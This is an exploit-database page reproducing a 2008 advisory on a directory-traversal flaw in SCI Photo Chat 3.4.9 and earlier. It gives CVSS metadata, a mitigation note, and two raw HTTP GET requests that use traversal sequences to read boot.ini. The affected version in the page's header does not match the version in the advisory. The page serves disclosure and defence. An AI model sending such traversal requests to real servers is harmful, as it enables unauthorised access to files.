header-logo
Suggest Exploit
vendor:
SCI Photo Chat
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: SCI Photo Chat
Affected Version From: 3.4.2009
Affected Version To: 3.4.2009
Patch Exists: YES
Related CWE: N/A
CPE: a:sci_photo_chat:sci_photo_chat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SCI Photo Chat Directory Traversal Vulnerability

SCI Photo Chat is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/27872/info

SCI Photo Chat is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.

This issue affects SCI Photo Chat 3.4.9 and prior versions. 

GET /docs/..\..\..\..\..\boot.ini HTTP/1.0
GET /docs/../../../../../boot.ini HTTP/1.0

Navigation

Suggest Exploit

Services By CQR